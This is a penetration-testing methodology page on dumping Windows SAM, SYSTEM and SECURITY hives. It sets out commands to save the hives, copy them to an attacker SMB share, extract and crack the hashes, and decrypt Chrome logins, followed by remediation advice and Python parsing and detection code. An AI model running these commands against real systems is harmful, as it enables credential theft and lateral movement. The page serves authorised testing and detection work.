Methodology Checklist
- Requires SYSTEM/Administrator privileges
- Reg save hives: reg save HKLM\SAM sam.hive; reg save HKLM\SYSTEM system.hive
- Impacket secretsdump local: impacket-secretsdump -sam sam.hive -system system.hive LOCAL
- NXC SAM: nxc smb [TARGET] -u [USER] -p [PASS] --sam
- Mimikatz: lsadump::sam
- Crack NTLM hashes: hashcat -m 1000 hashes.txt [wordlist]
- Test hashes for local admin reuse across network
Operational Context
Use when: Local admin access on a non-DC Windows machine. Dump the SAM database for local account NTLM hashes.
Think Dumber First: nxc smb [TARGET] -u [ADMIN] -p [PASS] --sam dumps SAM remotely. Local: reg save HKLM\SAM sam.save && reg save HKLM\SYSTEM system.save, then impacket-secretsdump -sam sam.save -system system.save LOCAL.
Skip when: Target is domain-joined with no local admin reuse. Local SAM hashes may only apply to that one machine, unless LAPS is not deployed (in which case the local Administrator password is likely shared).
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| reg.exe save hklm\sam C:\sam.save | Save SAM hive (run from admin prompt on target) |
| reg.exe save hklm\system C:\system.save | Save SYSTEM hive (contains BootKey to decrypt SAM) |
| reg.exe save hklm\security C:\security.save | Save SECURITY hive (LSA secrets, DCC2 cached creds) |
| sudo python3 smbserver.py -smb2support CompData /tmp/loot | Start SMB listener to receive exfiltrated files |
| move sam.save \\[LHOST]\CompData | Exfiltrate SAM hive to attacker via SMB |
| move system.save \\[LHOST]\CompData | Exfiltrate SYSTEM hive |
| move security.save \\[LHOST]\CompData | Exfiltrate SECURITY hive |
| python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | Extract hashes offline from saved hives |
| netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --sam | Remote SAM dump via NetExec |
| netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --lsa | Remote LSA secrets dump via NetExec |
| hashcat -m 1000 hashes.txt rockyou.txt | Crack NT hashes (local accounts) |
| hashcat -m 2100 dcc2_hashes.txt rockyou.txt | Crack DCC2 cached domain credential hashes |
Deep Dive & Workflow
Three Hives, Three Purposes
| Hive | Registry Path | Contains |
|---|---|---|
| SAM | HKLM\SAM | Local account LM/NT password hashes |
| SYSTEM | HKLM\SYSTEM | BootKey, required to decrypt SAM |
| SECURITY | HKLM\SECURITY | LSA secrets, DCC2 cached domain creds, DPAPI keys |
You cannot decrypt SAM without SYSTEM. Always save all three.
Manual Exfiltration Workflow
Target (admin shell):
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
Attacker:
sudo python3 smbserver.py -smb2support CompData /tmp/loot
Target:
move sam.save \\[LHOST]\CompData
move system.save \\[LHOST]\CompData
move security.save \\[LHOST]\CompData
Attacker:
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
The -smb2support flag is required: SMBv1 is disabled by default on modern Windows, so the target will only connect to the share over SMBv2.
Secretsdump Output Types
After running secretsdump, expect three output categories:
- NT Hashes: Administrator:500:aad...::: format; crack with hashcat mode 1000
- LSA Secrets: machine account keys, service account passwords, _SC_ service credentials
- DCC2: $DCC2$10240#username#hash; cached domain creds for offline domain login; crack with hashcat mode 2100 (very slow, roughly 800x slower than NTLM due to PBKDF2)
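The three output categories above have fixed line formats, which makes them easy to triage programmatically. The following is an added example, not code from the original page or from Impacket: it parses constructed secretsdump output (the hash values are made up) into NT, DCC2 and LSA entries, then answers the two questions the checklist ends with, whether the RID-500 Administrator hash is shared across hosts (the LAPS gap the report calls out) and whether any local account has no password at all. The section headers and the `DOMAIN/user:$DCC2$iterations#user#hash` layout follow secretsdump's real output; the host names and secret values are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample secretsdump output for three hosts (hash values are made up).
# WS01 and WS02 share one local Administrator NT hash; WS03 is LAPS-managed.
ADMIN_HASH_SHARED = "0123456789abcdef0123456789abcdef"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string (well-known constant)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty string (well-known constant)

SAMPLE_OUTPUT = {
    "WS01": f"""[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:{EMPTY_LM}:{ADMIN_HASH_SHARED}:::
Guest:501:{EMPTY_LM}:{EMPTY_NT}:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/jdoe:$DCC2$10240#jdoe#fedcba9876543210fedcba9876543210
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\\WS01$:plain_password_hex:00112233445566778899aabbccddeeff
[*] _SC_BackupSvc
CORP\\svc_backup:ConstructedPassw0rd
""",
    "WS02": f"""[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:{EMPTY_LM}:{ADMIN_HASH_SHARED}:::
""",
    "WS03": f"""[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:{EMPTY_LM}:fedcba9876543210fedcba9876543210:::
""",
}

# user:rid:lmhash:nthash:::
NT_LINE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")
# DOMAIN/user:$DCC2$iterations#user#hash
DCC2_LINE = re.compile(
    r"^(?P<domain>[^/]+)/(?P<user>[^:]+):\$DCC2\$(?P<iterations>\d+)#[^#]+#(?P<hash>[0-9a-f]{32})$"
)


def parse_secretsdump(text):
    """Split one host's secretsdump output into the three categories listed above."""
    parsed = {"nt": [], "dcc2": [], "lsa": []}
    section, secret_name = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[*] Dumping local SAM"):
            section = "nt"
        elif line.startswith("[*] Dumping cached domain"):
            section = "dcc2"
        elif line.startswith("[*] Dumping LSA Secrets"):
            section = "lsa"
        elif line.startswith("[*] "):
            # inside the LSA section, "[*] name" announces the next secret ($MACHINE.ACC, _SC_<service>, ...)
            secret_name = line[4:] if section == "lsa" else None
        elif section == "nt" and (m := NT_LINE.match(line)):
            parsed["nt"].append(m.groupdict())
        elif section == "dcc2" and (m := DCC2_LINE.match(line)):
            parsed["dcc2"].append(m.groupdict())
        elif section == "lsa":
            parsed["lsa"].append((secret_name, line))
    return parsed


def find_admin_reuse(outputs, rid="500"):
    """Return {nt_hash: [hosts]} for every RID-500 NT hash seen on more than one host.
    Any entry means the built-in Administrator password is shared, i.e. LAPS is not rotating it."""
    by_hash = defaultdict(list)
    for host, text in outputs.items():
        for row in parse_secretsdump(text)["nt"]:
            if row["rid"] == rid:
                by_hash[row["nt"]].append(host)
    return {h: hosts for h, hosts in by_hash.items() if len(hosts) > 1}


def find_empty_passwords(outputs):
    """(host, user) pairs whose NT hash is the empty-string hash, i.e. the account has no password."""
    return sorted(
        (host, row["user"])
        for host, text in outputs.items()
        for row in parse_secretsdump(text)["nt"]
        if row["nt"] == EMPTY_NT
    )


if __name__ == "__main__":
    for nt_hash, hosts in find_admin_reuse(SAMPLE_OUTPUT).items():
        print(f"Local Administrator hash {nt_hash} reused on: {', '.join(hosts)}")
    print("Accounts with no password:", find_empty_passwords(SAMPLE_OUTPUT))
    print("DCC2 entries on WS01:", parse_secretsdump(SAMPLE_OUTPUT["WS01"])["dcc2"])
```

Feed it one secretsdump capture per host and the reuse map is the evidence for the "no LAPS" root cause in the report; the DCC2 rows are the ones worth budgeting cracking time for separately, since mode 2100 is so much slower than mode 1000.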
Remote Dumping (No File Transfer)
If you have valid admin credentials and don't want to touch disk on the target:
netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --sam
netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --lsa
DPAPI
The SECURITY hive also yields DPAPI master keys. These decrypt per-user secrets stored by Chrome, Outlook, and RDP credential files. Requires Mimikatz:
mimikatz # dpapi::chrome /in:"C:\Users\[USER]\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| reg save fails | Not admin or UAC blocking | Run from elevated prompt: Right-click > Run as Administrator; or bypass UAC first |
| impacket-secretsdump returns invalid format | Wrong file pair | Must have matching SAM + SYSTEM from same machine; SECURITY hive optional for LSA secrets |
| Local admin hash not valid on other machines | LAPS deployed or unique passwords | Confirm: nxc smb [SUBNET]/24 -u Administrator -H [HASH] --local-auth; LAPS = different hash per machine |
| SAM hash shows NULL | Account has no password | Account with no password still works: nxc smb [TARGET] -u Administrator -p '' |
| Cannot export SAM while OS running | VSS required | Use Volume Shadow Copy: vssadmin create shadow /for=C: then copy from shadow volume path |
Reporting Trigger
Finding Title: SAM Database Dumped: Local Account Hashes Compromised
Impact: SAM database dump provides NTLM hashes for all local accounts. If the local Administrator hash is shared across multiple machines (no LAPS), a single hash enables lateral movement to all matching systems via Pass-the-Hash.
Root Cause: Local Administrator password reuse across multiple systems without LAPS. SAM database accessible after achieving local admin rights without triggering security alerts.
Recommendation: Deploy LAPS (Local Administrator Password Solution) to randomize and rotate local admin passwords. Alert on reg.exe or vssadmin.exe invocation by non-admin processes. Implement Credential Guard to protect SAM hashes in memory.
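The recommendation to alert on reg.exe and vssadmin.exe is straightforward to turn into a detection over process-creation telemetry. The following is an added example, not code from the original page: it runs two rules over constructed Sysmon Event ID 1 style records (host names, users and paths are assumptions), one for reg.exe saving the SAM, SYSTEM or SECURITY hive and one for vssadmin creating a shadow copy, and aggregates hits per host. It goes slightly beyond the page's wording by matching on the hive path in the command line regardless of which account ran it, since the save itself already requires admin rights, and it rates a host high when both SAM and SYSTEM were saved, because that pair is what the workflow above needs to decrypt the hashes.

```python
import re
from collections import defaultdict

# Constructed process-creation records in Sysmon Event ID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg.exe save hklm\\sam C:\\sam.save", "parent": "C:\\Windows\\System32\\cmd.exe"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg.exe save hklm\\system C:\\system.save", "parent": "C:\\Windows\\System32\\cmd.exe"},
    # benign: saving an application key, not a credential hive
    {"host": "WS01", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\reg.exe",
     "cmdline": "reg save HKLM\\Software\\Contoso app.bak", "parent": "C:\\Windows\\System32\\cmd.exe"},
    {"host": "WS02", "user": "NT AUTHORITY\\SYSTEM", "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin create shadow /for=C:", "parent": "C:\\Windows\\System32\\svchost.exe"},
    # benign: listing shadows does not create one
    {"host": "WS02", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin list shadows", "parent": "C:\\Windows\\System32\\cmd.exe"},
]

# reg.exe save of one of the three credential hives, case-insensitive, with or without ".exe"
HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(?P<hive>sam|system|security)\b", re.I
)
# vssadmin creating a shadow copy (the "cannot export SAM while OS running" workaround)
SHADOW_CREATE = re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b", re.I)


def classify(event):
    """Return (rule, detail) when a record matches one of the two rules, else None."""
    cmd = event["cmdline"]
    m = HIVE_SAVE.search(cmd)
    if m:
        return ("hive_save", m.group("hive").lower())
    if SHADOW_CREATE.search(cmd):
        return ("shadow_create", None)
    return None


def detect(events):
    """Aggregate matching records per host into alerts.
    A host where both SAM and SYSTEM were saved is rated high: that pair decrypts the hashes."""
    per_host = defaultdict(lambda: {"hives": set(), "shadow": False, "users": set()})
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        rule, detail = hit
        entry = per_host[ev["host"]]
        entry["users"].add(ev["user"])
        if rule == "hive_save":
            entry["hives"].add(detail)
        else:
            entry["shadow"] = True
    alerts = []
    for host, e in per_host.items():
        severity = "high" if {"sam", "system"} <= e["hives"] else "medium"
        alerts.append({
            "host": host,
            "severity": severity,
            "hives": sorted(e["hives"]),
            "shadow_copy": e["shadow"],
            "users": sorted(e["users"]),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

In production the same two regexes apply to Security event 4688 command lines (with command-line auditing enabled) as well as Sysmon; the per-host aggregation is what separates a single reg.exe call from the SAM-plus-SYSTEM pair that actually yields crackable hashes.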